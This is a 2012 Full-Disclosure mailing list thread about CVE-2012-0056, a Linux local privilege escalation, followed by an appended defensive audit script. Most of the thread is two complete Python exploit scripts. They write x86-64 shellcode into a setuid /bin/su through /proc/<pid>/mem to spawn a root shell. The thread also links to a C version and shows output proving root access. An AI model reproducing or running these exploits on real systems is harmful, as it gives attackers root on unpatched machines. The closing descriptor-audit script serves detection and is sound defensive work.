Re: [Full-disclosure] Linux Local Root -- CVE-2012-0056 -- Detailed Write-up



2012/1/23 Jason A. Donenfeld <Jason@xxxxxxxxx>:
NICE! Well, I guess posting that blog post defeated the point of not
publishing. :-D

Thanks for compliance with first full-disclosure famwhoring rule:
always post warez to make kids happy! :)

On a related note, here goes my "private" version which relaxes the
rules regarding file permissions on /bin/su (i.e. not world readable).
This is to point out you can just overwrite 8kb of .text (default
stderr buffer, more is possible, but without mere nops) instead of
juggling with objdump.

#!/usr/bin/python
# CVE-2012-0056 amd64
# sd@xxxxxxxxxxxxx
#
# hg clone https://code.google.com/p/python-passfd
# cd python-passfd; ./setup.py build_ext --inplace; cd src
# mv ~/hurrdurr.py .
# ./hurrdurr.py
from socket import *
from passfd import *
from os import *
from socket import *
from sys import *
if argv[-1]=='hax':
    sk=int(argv[1])
    fd=open("/proc/%d/mem"%getppid(),O_WRONLY)
    lseek(fd,0x401000,0)
    sendfd(sk,fd)
else:
    a,b=socketpair()
    if not fork():
        execl("/usr/bin/python","python",
              __file__,str(a.fileno()),'hax')
    dup2(recvfd(b)[0],2)
    execl("/bin/su","su",("\x90"*8000)+"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2"+
            "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb"+
            "\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6"+
            "\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05");




So, here's my code:
 http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c

I wrote the shellcode by hand too, and you can grab the 32 and 64 bit
versions from that same tree.

Have fun.



BTW, before I'm asked, the reason why I don't hard code 12 for the
length of the su error string is that it's different on different
distros.

On Mon, Jan 23, 2012 at 02:14, sd <sd@xxxxxxxxxxxxx> wrote:
2012/1/23 Jason A. Donenfeld <Jason@xxxxxxxxx>:
Server presently DoS'd, or dreamhost is tweaking again.

boring tl;dr - don't play kaminsky on us :)

#!/usr/bin/python
# CVE-2012-0056 amd64
# sd@xxxxxxxxxxxxx
#
# hg clone https://code.google.com/p/python-passfd
# cd python-passfd; ./setup.py build_ext --inplace; cd src
# mv ~/hurrdurr.py .
# ./hurrdurr.py `objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
from socket import *
from passfd import *
from os import *
from socket import *
from sys import *
from time import *
if argv[-1]=='hax':
       sk=int(argv[1])
       fd=open("/proc/%d/mem"%getppid(),O_WRONLY)
       lseek(fd,int(argv[2].split('x')[-1],16)-12,0)
       sendfd(sk,fd)
       sleep(1)
else:
       a,b=socketpair()
       if not fork():
               execl("/usr/bin/python","python",
                     __file__,str(a.fileno()),argv[1],'hax')
       dup2(recvfd(b)[0],2)
       execl("/bin/su","su","\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2"+
               "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb"+
               "\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6"+
               "\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05");

--
./hurrdurr.py `objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
id
uid=0(root) gid=1000(sd)
groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),110(netdev),125(lastfm),1000(sd)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
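Editor's note: the two scripts in this thread share one mechanism: an unprivileged child opens /proc/<parent pid>/mem for writing, hands the descriptor to its parent over a socketpair (SCM_RIGHTS via python-passfd), and the parent installs it as stderr before exec'ing the setuid /bin/su, so su's own error message is written into its text segment. The following is an added audit example written for this note; it is not code from the thread or from either author. It takes the defender's view of that pattern and lists descriptors that resolve to /proc/<N>/mem, flagging the two things the exploit needs: a holder whose pid is not N (the child that opened it), and the descriptor sitting on a standard stream (fd 0-2). The SAMPLE_ENTRIES table is constructed for the example, and the pid/fd values in it are invented; the function and variable names are the example's own.

```python
#!/usr/bin/env python3
"""Audit open descriptors that point at /proc/<pid>/mem.

Added example, not part of the original thread.  Pure logic lives in
classify()/scan_entries() so it can be run over constructed input; the
collect_proc_fds() walker feeds it from a live /proc when run as a script.
"""
import os
import re
import sys
from collections import namedtuple

# readlink() of /proc/<pid>/fd/<n> yields the target path; we only care
# about targets of the form /proc/<N>/mem.
MEM_RE = re.compile(r"^/proc/(\d+)/mem$")

Finding = namedtuple("Finding", "pid fd target_pid reasons")


def classify(pid, fd, link):
    """Return a Finding for a /proc/<N>/mem descriptor, or None otherwise.

    pid  - process that holds the descriptor
    fd   - descriptor number inside that process
    link - result of os.readlink('/proc/<pid>/fd/<fd>')
    """
    m = MEM_RE.match(link)
    if not m:
        return None
    target = int(m.group(1))
    reasons = ["descriptor refers to /proc/%d/mem" % target]
    # The exploit opens the *parent's* mem from a child; a holder that is
    # not the target process is the strongest signal.
    if target != pid:
        reasons.append("holder pid %d differs from target pid %d" % (pid, target))
    # dup2() onto fd 2 is what turns a setuid binary's error message into
    # a memory write; any standard stream backed by mem is suspicious.
    if fd in (0, 1, 2):
        reasons.append("installed as standard stream fd %d" % fd)
    return Finding(pid, fd, target, reasons)


def scan_entries(entries):
    """Run classify() over an iterable of (pid, fd, link) and keep the hits."""
    findings = []
    for pid, fd, link in entries:
        f = classify(pid, fd, link)
        if f is not None:
            findings.append(f)
    return findings


def collect_proc_fds():
    """Yield (pid, fd, link) for every descriptor readable under /proc.

    Without root only the caller's own processes are visible, so run as
    root for a system-wide view.
    """
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        fddir = "/proc/%d/fd" % pid
        try:
            fds = os.listdir(fddir)
        except OSError:
            continue  # process exited or is not ours to inspect
        for fdname in fds:
            try:
                link = os.readlink(os.path.join(fddir, fdname))
            except OSError:
                continue  # descriptor closed between listdir and readlink
            yield pid, int(fdname), link


# Constructed sample (not captured from a real host): pid 1000 is a normal
# shell; pid 4242 has had /proc/4242/mem dup2()'d onto its stderr, and its
# child 4243 still holds the descriptor it opened and passed over.
SAMPLE_ENTRIES = [
    (1000, 0, "/dev/pts/0"),
    (1000, 1, "/dev/pts/0"),
    (1000, 2, "/dev/pts/0"),
    (4242, 0, "/dev/pts/0"),
    (4242, 2, "/proc/4242/mem"),
    (4243, 5, "/proc/4242/mem"),
]


if __name__ == "__main__":
    # `--sample` runs over the constructed table; otherwise walk the live /proc.
    entries = SAMPLE_ENTRIES if "--sample" in sys.argv else collect_proc_fds()
    for f in scan_entries(entries):
        print("pid %d fd %d -> /proc/%d/mem: %s"
              % (f.pid, f.fd, f.target_pid, "; ".join(f.reasons)))
```

Run it with `--sample` to see both constructed hits (pid 4242's stderr and pid 4243's spare descriptor). On a live system treat the output as a triage list rather than proof: debuggers and some tracing tools open /proc/<pid>/mem legitimately, and the real fix is a kernel that carries the CVE-2012-0056 patch, which is what makes the write itself fail regardless of how the descriptor was obtained.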
